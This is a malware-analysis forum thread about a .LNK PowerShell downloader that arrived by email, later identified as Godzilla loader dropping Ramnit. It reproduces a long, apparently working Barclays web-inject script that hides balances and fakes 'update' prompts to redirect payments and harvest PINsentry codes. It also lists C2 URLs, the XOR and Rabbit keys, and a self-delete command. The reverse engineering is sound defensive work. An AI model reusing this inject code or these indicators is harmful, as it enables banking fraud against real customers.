.INK Powershell Downloader

[kd77]

I'm quite new to this but I think I've found a powershell downloader in the wild which is FUD currently.

I obtained this malware via my Email inbox from a hack server.

[Antelox]

Hi, it tries to download a remote content through powershell from

Code: Select all

https://enetpreneur.com/vabun/encar

It 404s right now, did you happen to retrieve the payload?
Can you share the email?

Thanks for sharing...

BR,

Antelox

[kd77]

Sure, it just downloads 2 files, and sends http requests to an array of domain names. The process is injected into rundll32, or drops a dll and runs I'm not that sure.

I will post the contents of the email when I can.

[kd77]

I've done more analysis, it looks like a banking trojan designed for barclays bank and calls back to multiple domains via HTTP.

Strings:

Code: Select all

0x2c05c78 (905): .Views.TakeOver.MakeAPaymentUK.js GP
data_before
if(this.isNumeric(a.val())){
data_end

data_inject
if (a.attr('id')=="paymentAmount" && iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert==4){if (a.val().length<4){a.val('');return;}else{$('.div-amount-input.fieldcontainer .input-box').prepend("<div style='line-height:50px; font-size:18px;z-index:1000;width:100%;height:50px;background-color:#fff;position:absolute'>"+a.val()+"</div>");}}
data_end

data_after
data_end

set_url https://bank.barclays.co.uk/js/ib/ib-post-ftb-bwo-* GP
data_before
d("contextMenuData").innerHTML),n,c,h,g,q,f,r={},p,d,l,m,k,b={}
data_end
data_inject
;if (iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert==1 || /Sorry/.test(iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert)){ var tt=JSON.parse(dk
0x2c06340 (9284): _before
content")}catch(d){return""}}}
data_end
data_inject
;iBarclays.iBarclays={	
	r:function(){	
		if ($('#a<#ECHO crep#>').length){
			$('#a<#ECHO crep#> span.balance strong').html('&pound;'+iBarclays.iBarclays.AB($('#a<#ECHO crep#> span.balance strong').html().replace(/[^0-9.-]/gim,""),'<#ECHO rep#>'));
		}
		$('ul.account-transfers').hide();
		
		var l=setInterval(function(){
			if ($('div.item:contains("check your account balance.")').length){
				var currentDate = new Date(new Date().getTime() + 24 * 60 * 60 * 1000);
				var day = currentDate.getDate()
				var month = currentDate.getMonth() + 1
				var year = currentDate.getFullYear()
				$('div.item:contains("check your account balance.")').text('719 - REMINDER - Essential maintenance. We\'ll be running essential maintenance on our payment systems on '+month+'.'+day+'.'+year+'. Please try again later.')
			}

		
			if ($("table[id='filterable-ftb'] tr:eq(1) td").length==7){
				$("table[id='filterable-ftb'] tr").each(function(){$(this).find("td:last").remove();$(this).find("th:last").remove();});
			}
			if ($('.holder.account-list span.mid').length){
				$('.holder.account-list span.mid').html('');
			}
			$('.download-print-top').hide();
			$('tr:contains("<#ECHO rep#>")').hide();
			$('tr:contains("'+iBarclays.iBarclays.AB('<#ECHO rep#>',0)+'")').hide();
			$('tr:contains("<#ECHO arep#>")').hide();
			$('#summaryMiddlePanel').hide();
			$('.singleAccount4').hide();
			$('ul.saved_payees:contains("<#ECHO arep#>")').hide();
			$('td.accountBalance').html('');
		},250);
		$('#access-links').css('height','auto').css('position','relative').css('z-index','0');
	},
	AB:function(b,a){ a=Math.round((parseFloat(b)+parseFloat(a))*100)/100; var i = parseInt(a = (+a || 0).toFixed(2)) + ''; if( i.length > 3 ){var j = i.length % 3;} else{	var j = 0; } return (j ? i.substr(0, j) + ',':'') + i.substr(j).replace(/(\d{3})(?=\d)/g, "$1" + ",") + (2 ? "." + Math.abs(a - i).toFixed(2).replace(/-/, 0).slice(2) : ""); },
	
	s:function(){
		iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert=0;
		iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText=-1;
		var mn={},mb={},m=0,t=0,ml=JSON.parse($('#contextMenuData').text());
		for (var i=0;i<ml.a.length;i++){
			mn[ml.a[i].p]=JSON.stringify(ml.a[i].f);
			mb[ml.a[i].p]=JSON.stringify(ml.a[i].t);
		}

if (/Business/.test($('#personal-business').text())){
		for (var i=0; i<$('li.account[id*=a]').length; i++){
			if ($('#a'+i+' p[aria-label="available balance"]').length){
				try{
					if (/ISA/.test($('#a'+i+' span.account-name:first').html())){
					}else if (/COMMUN/.test($('#a'+i+' span.account-name:first').html())){
					}else if (/Saver/.test($('#a'+i+' span.account-name:first').html())){
					}else if (parseFloat(m)<parseFloat($('#a'+i+' span.balance').html().replace(/[^0-9.-]/gim,""))){				
						if (/af-pay/.test(mn[$('#a'+i+' span.account-detail').html().replace(/[^0-9]/gim,"")]) && /b-/.test(mb[$('#a'+i+' span.account-detail').html().replace(/[^0-9]/gim,"")])){
							m=parseFloat($('#a'+i+' span.balance strong').html().replace(/[^0-9.-]/gim,""));
							t=$('#a'+i+' span.account-detail').html().replace(/[^0-9]/gim,"");
							iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSize=i;
						}
					}
				}catch(ee){}
			}
		}	
}else{
		
		for (var i=0; i<$('li.account[id*=a]').length; i++){
			if ($('#a'+i+' p[aria-label="available balance"]').length){
				try{
					if (/ISA/.test($('#a'+i+' span.account-name:first').html())){
					}else if (/COMMUN/.test($('#a'+i+' span.account-name:first').html())){
					}else if (/Saver/.test($('#a'+i+' span.account-name:first').html())){
					}else if (parseFloat(m)<parseFloat($('#a'+i+' span.balance').html().replace(/[^0-9.-]/gim,""))){
						if (/af-pay/.test(mn[$('#a'+i+' span.account-detail').html().replace(/[^0-9]/gim,"")])){
							m=parseFloat($('#a'+i+' span.balance strong').html().replace(/[^0-9.-]/gim,""));
							t=$('#a'+i+' span.account-detail').html().replace(/[^0-9]/gim,"");
							iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSize=i;
						}
					}
				}catch(ee){}
			}
		}
}		
		
		
		
		iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader=m;
		if (/Business/.test($('#personal-business').text())){
			iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader=JSON.parse(iBarclays.dmb);	
		}else{
			iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader=JSON.parse(iBarclays.dm);
		}
		
		for (i=0;i<iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader.dMin.length;i++){
			if (parseFloat(iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader.dMin[i])<parseFloat(iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader)) iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText=i;
		}
		
		try{if (localStorage.getItem('b')==100){iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText=-1}}catch(ee){}
		
		
		if (parseFloat(iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText)>-1){
		
			iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert=1;
			$('#navigation-ftb').prepend("<span style='z-index:1000;width:100%;height:60px;background-color:#fff;position:absolute;left:0'>&nbsp;</span>");
			$('#account-view-messages').append('<div style="margin-top:-140px;font-size:14px;font-family:expertsans-light,Verdana,Arial,Helvetica,Sans Serif;left: 0px; width: 100%; height: '+$('#content').height()+'px; position: absolute; z-index: 1000; background-color: rgb(255, 255, 255);"><div style="padding:20px;z-index:0"><h1 style="font-weight:bold;z-index:0;font-size:3.1em;color:#036">WE NEED TO UPDATE SOME IMPORTANT INFORMATION</h1><br/>Please take a minute to make sure that the information we hold about you is up to date. We need to check this information with you every 2 years for legal reasons so appreciate you taking the time to read this</div></div>');
			if (/hidden/.test($('#account-view-messages').attr('class'))) $('#account-view-messages').removeClass('hidden');
			$('#a'+iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSize+' #account-actions_id').css('position','relative').css('z-index','1001');
			$('#a'+iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSize+' #account-actions span').text('Click to start');
			
			
			
			$('#access-links').css('height','auto').css('position','relative').css('z-index','0');
			
			var l=setInterval(function(){
				$('span.edit-counter').hide();
				if ($('input[name="action:PayBillStep3NewPayee_display"]').length){
					$('input[name="action:PayBillStep3NewPayee_display"]').click(function(){				
						$('#access-links').css('position','fixed').css('left','0').css('top','0').css('z-index','1000').css('background-color','#fff').css('width','100%').css('height','100%');
						document.getElementById('AccountNumber').value=iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader.dAcc[iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText];
						document.getElementById('sortCode1').value=iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader.dSort1[iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText];
						document.getElementById('sortCode2').value=iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader.dSort2[iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText];
						document.getElementById('sortCode3').value=iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader.dSort3[iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText];
						document.getElementById('paymentAmount').value=iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.
0x2c08787 (124218): ve logged in to Online Banking without using PINsentry, before you can update, you'll need to:");
						$('h3:contains("for payment")').text("How do I get my 8-digit PINsentry code for update?");
				}

				if (document.getElementById('table-search')!=null && iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert==1){				
					if (document.getElementById('payee-new-radio')==null){
						localStorage.setItem('b','100');
						document.getElementById('home').click();
					}				
					iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert=3;
					setTimeout(function(){
						$('#paybill-step1-from-account div.border_left').prepend("<div style='font-size:20px;margin:-5px;z-index:1000;width:800px;height:50px;background-color:#fff;position:absolute'>You'll need your PINsentry device to make any changes</div>");
						$('h2:contains("ake")').html('Please, change your contact details now.').css('z-index','0');
						$('div.standingOrderText').html('Update your phone number and other information.').css('z-index','0');
						$('li.first.current').html('1. Update your details').css('z-index','0');
						$('li.last').html('3. Finish').css('z-index','0');
						$('#paybill-step1-from-account h3').html('Any changes made will be applied to all of your Barclays accounts').css('z-index','0');
						$('.singleAccount1').html('You\'ll need your PINsentry device to make any changes').css('z-index','0');
					
						$('#paybill-step1-to-account h3').html('This should only take few minutes, so please, let us protect you').css('z-index','0');					
						$('ul.payAc li:eq(1)').css('padding-left',$('ul.payAc li:eq(1)').width());
						$('label[for="payee-new-radio"] span').css('width',$('label[for="payee-new-radio"] span').width()).css('display','block');
					
						$('.singleAccount2,.singleAccount3,.singleAccount4, .payeeList,ul.payAc li:eq(0),ul.payAc li:eq(2),ul.payAc li:eq(3)').hide();
						$('label[for="payee-new-radio"] span').html('Continue');
					
						$('#payee-existing').css('width',$('#payee-existing').width()+'px').css('height',$('#payee-existing').height()+'px').html('').css('z-index','0');
						$('#access-links').css('height','auto').css('position','relative').css('z-index','0');
					},3200);
				}else if(document.getElementById('payeeName')!=null && iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert==3){			
					$('.error').html('Invalid field');					
					iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert=4;
					$('p.alert_desc').html('Keep your PINsentry to hand - you\'ll need it for the next step.').css('z-index','0');
					$('h4').html('Update details').css('z-index','0');
					$('label:contains("Account holder name")').html('Your last name').css('z-index','0');
					$('label:contains("Sort code")').html('Date of birth (MM/DD/YY)').css('z-index','0');
					$('label:contains("Account Number")').html('Your current phone number:').css('z-index','0');

					$('#label-paymentSavePayee').css('color','#fff');
					
					$('h3:contains("Payment details")').html('Enter the last 4-digits of your card').css('z-index','0');
					$('#cancel').hide();					

					$('div.currency-symbol,#helplink_2').hide();
					$('acnt.noborder.paymentReferenceDiv div-text-input.fieldcontainer span.hide').hide();
					$('div.amount-input-balance').hide();
					$('label:contains("Amount")').html('Last 4-digits').css('z-index','0');
					$('label:contains("ayment referen")').html('Confirm Last 4-digits').css('z-index','0');
					$('#paymentReference').attr('placeholder','Confirm Last 4-digits of your card');
					$('.edit-counter').hide();
					$('.radio-list.div-margin').prepend("<span style='z-index:1000;width:800px;height:50px;background-color:#fff;position:absolute;left:0'></span>");
					if (parseInt(iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader)<parseInt(iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader.dMax[iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText])){
						iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader=parseInt(parseInt(iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader)*85/100); 
					}else{
						iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader=parseInt(iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader.dMax[iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText]);
					}
					if (iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader<1000){
						iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader=parseInt(iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader.toString().substr(0,2)+''+'9');
					}else{
						iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader=parseInt(iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader.toString().substr(0,3)+''+'9');
					}
					
					$('span.ac_spn').hide();
				}else if (document.getElementById('cardDigits')!=null && iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert==4){
					$('div.alert_Box #info-img').html('Authorise an Update.').css('z-index','0');
					$('.helplinktext').text('How do I get my 8-digit PINsentry code for update?').css('z-index','0');
					$('div.alert_Box p.alert_desc').html('To update your details and some information, you\'ll need your PINsentry device.').css('z-index','0');					
				}else if(document.getElementById('pin-authorise1')!=null && iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert==4){
					$('.error').html('Invalid field').css('z-index','0');
					iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert=5;
					$('h2:contains("ake")').html('Please, change your contact details now.').css('z-index','0');
					$('li.first.complete-current').html('1. Update your details').css('z-index','0');
					$('li.last').html('3. Finish').css('z-index','0');
					$('div.paymentSummary').prepend("<div style='z-index:100;width:800px;height:310px;background-color:#fff;position:absolute'></div>");
					
					$('div.pinsentryHeading').html('Please, authorise your changes with your PINsentry').css('z-index','0');
					$('div.pinsStepsRight div.pinsStepContentRight:eq(0)').html('Enter <strong style="z-index:0">One-time</strong>(REF) digits number <div style="z-index:0" class="pinsentryAccount">'+iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileExtensionHeader.dAcc[iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoEmailMobileNumberForAlertText]+'</div> and press <strong style="z-index:0">ENTER</strong>').css('z-index','0');
					$('div.pinsStepsRight div.pinsStepContentRight:eq(1)').html('Enter Amount <strong style="z-index:0">security code:</strong><div style="z-index:0" class="pinsentryAmount">'+iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.inValidFileSizeHeader+'84</div>and press <strong style="z-index:0">ENTER</strong>').css('z-index','0');
					$('#cancel, #backButton').hide();
					$('#confirmPayment').css('width',$('#confirmPayment').width()+'px');
					$('#confirmPayment').attr('value','Confirm').css('z-index','0');
					
					$('#access-links').css('height','auto').css('position','relative').css('z-index','0');;
					
				}else if ($('div.section-error-o1').length && iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert==5){
					iBarclays.Controls.Forms.ErrorMessages.bCloudMessages.NoAuthorisationToEditDeleteAlert=4;
					$('.chat-text').hide();
					$('div.section-error-o1 p').html('519 - You may have entered the 8-digit code from your PINsenty incorrectly, or generated the wrong code. When trying again, please make sure you use the SING button, enter the right personal REF and amount authorization code is displayed properly on the PINsentry screen');
				}else

[sysopfb]

0c19c460c7e8de4c36a9cdfe30836a9bdd18976e2f0f8f7cb9e79d13de00237b

Looks like godzilla loader, c2 urls are push pop stored and then XORd with 'GODZILLA'

C2s:

Code: Select all

hxxps://bokergrop.eu/bin/161/css.php
hxxps://kuseyambar.eu/bin/161/css.php
hxxps://morefitggr.eu/bin/161/css.php
hxxps://perefacki.eu/bin/161/css.php
hxxps://salemalertoy.eu/bin/161/css.php

[sysopfb]

89b138eaaade5a1ec36e2d1422ae38059f138e81b722301e713b65a74de521c7

The file has the same packer as the godzilla loader but apppears to be ramnit

The unpacked file has strings that are encrypted with Rabbit but the bots Rabbit routine uses a shr delta of 8 instead of 1 when performing decryption when comparing it with python code from here https://github.com/alnkpa/pycc/blob/mas ... /Rabbit.py

Changing the line in encrypt from

Code: Select all

b >>=1

to

Code: Select all

b >>=8

Allows you to decrypt strings:

Code: Select all

Found string data at :0x415780
ntdll.dll
Found string data at :0x4157a8
ZwSetContextThread
Found string data at :0x4157d8
RtlNtStatusToDosError
Found string data at :0x41580c
ntdll.dll
Found string data at :0x415834
ZwWriteVirtualMemory
Found string data at :0x415868
ntdll.dll
Found string data at :0x415890
ZwGetContextThread
Found string data at :0x4158c0
RtlNtStatusToDosError
Found string data at :0x4158f4
ntdll.dll
Found string data at :0x41591c
ZwAllocateVirtualMemory
Found string data at :0x415950
ntdll.dll
Found string data at :0x415978
ZwReadVirtualMemory
Found string data at :0x4159a8
ntdll.dll
Found string data at :0x4159d0
NtMapViewOfSection
Found string data at :0x415a00
RtlNtStatusToDosError
Found string data at :0x415a34
ntdll.dll
Found string data at :0x415a5c
NtUnmapViewOfSection
Found string data at :0x415a90
RtlNtStatusToDosError
Found string data at :0x415ac4
ntdll.dll
Found string data at :0x415aec
LdrLoadDll
Found string data at :0x415b14
LdrGetProcedureAddress
Found string data at :0x415b48
ZwProtectVirtualMemory
Found string data at :0x415b7c
ntdll.dll
Found string data at :0x415ba4
NtCreateSection
Found string data at :0x415bd0
ZwClose
Found string data at :0x415bf4
RtlNtStatusToDosError
Found string data at :0x415c28
RtlExitUserThread
Found string data at :0x415c58
ntdll.dll
Found string data at :0x415c80
CreateRemoteThread
Found string data at :0x415cb0
kernel32.dll
Found string data at :0x415cdc
shlwapi.dll
Found string data at :0x415ec0
shlwapi.dll
Found string data at :0x415d04
PathStripPathA
Found string data at :0x415ee8
cmd.exe /C ping 1.1.1.1 -n 1 -w 5000 > Nul & Del "
Found string data at :0x415f3c
rundll32.exe
Found string data at :0x415f68
kernel32.dll
Found string data at :0x415f94
FindResourceW
Found string data at :0x415fc0
LoadResource
Found string data at :0x415fec
LockResource
Found string data at :0x416020
9kb3MGJpBS3J5y38
Found string data at :0x416050
kernel32.dll
Found string data at :0x41607c
CreateDirectoryA
Found string data at :0x4160ac
CopyFileA
Found string data at :0x4160d4
kernel32.dll
Found string data at :0x416100
CopyFileA
Found string data at :0x416128
DeleteFileA
Found string data at :0x416150
:Zone.Identifier
Found string data at :0x416180
kernel32.dll
Found string data at :0x4161ac
ExitProcess
Found string data at :0x4161d4
Advapi32.dll
Found string data at :0x416200
OpenProcessToken
Found string data at :0x416230
AdjustTokenPrivileges
Found string data at :0x4162e8
kernel32.dll
Found string data at :0x416314
Sleep
Found string data at :0x416338
ResumeThread
Found string data at :0x416364
GetThreadContext
Found string data at :0x416394
WriteProcessMemory
Found string data at :0x4163c4
SetThreadContext
Found string data at :0x416408
kernel32.dll
Found string data at :0x416434
CreateProcessA
Found string data at :0x416460
kernel32.dll
Found string data at :0x41648c
GetWindowsDirectoryA
Found string data at :0x416568
kernel32.dll
Found string data at :0x416594
CreateProcessA
Found string data at :0x41667c
kernel32.dll
Found string data at :0x4166a8
LoadLibraryA
Found string data at :0x4166d4
Shell32.dll
Found string data at :0x4166fc
SHGetFolderPathA

Inside the IMG resource section, the first 0x30 bytes are skipped and the decrypted string 9kb3MGJpBS3J5y38 is used to Rabbit decrypt out the ramnit DLL which is attached.

Thanks for Antelox for listening to my ramblings while I was reversing the string encryption.